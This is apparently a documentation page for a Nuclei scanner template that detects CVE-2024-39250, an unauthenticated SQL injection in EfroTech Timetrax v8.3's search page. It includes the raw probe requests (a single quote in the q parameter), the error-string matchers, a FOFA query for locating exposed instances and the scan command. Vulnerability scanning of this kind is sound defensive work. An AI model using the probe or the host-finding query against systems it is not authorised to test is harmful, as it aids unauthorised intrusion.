EfroTech Timetrax v8.3 - Sql Injection
ID: CVE-2024-39250
Severity: high
Author: s4e-io,efran
Tags: cve,cve2024,sqli,timetrax
Description
Section titled “Description”EfroTech Timetrax v8.3 was discovered to contain an unauthenticated SQL injection vulnerability via the q parameter in the search web interface.
YAML Source
Section titled “YAML Source”id: CVE-2024-39250
info: name: EfroTech Timetrax v8.3 - Sql Injection author: s4e-io,efran severity: high description: | EfroTech Timetrax v8.3 was discovered to contain an unauthenticated SQL injection vulnerability via the q parameter in the search web interface. reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-39250 - https://www.tenable.com/cve/CVE-2024-39250 - https://github.com/efrann/CVE-2024-39250 - https://vuldb.com/?id.272268 classification: epss-score: 0.00043 epss-percentile: 0.09359 metadata: vendor: efroTech product: timetrax fofa-query: icon_hash="-661694518" tags: cve,cve2024,sqli,timetrax
flow: http(1) && http(2)
http: - raw: - | GET /Login.aspx HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'contains(body,"TimeTrax - Cloud HR Software")' - 'contains(content_type, "text/html")' - "status_code == 200" condition: and internal: true
- raw: - | GET /search.aspx?q=' HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'contains_all(body,"Incorrect syntax near","Unclosed quotation mark after the character string")' - 'contains(content_type, "text/html")' - "status_code == 500" condition: and# digest: 4b0a00483046022100abf24393503d37b661c568b0ce3413448e233056975273c95627f48c5a8f2e630221008b4c3b98140527ad406e4c3388e98a5b1691cd6afdd9260f0da4eb999c461b01:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-39250.yaml"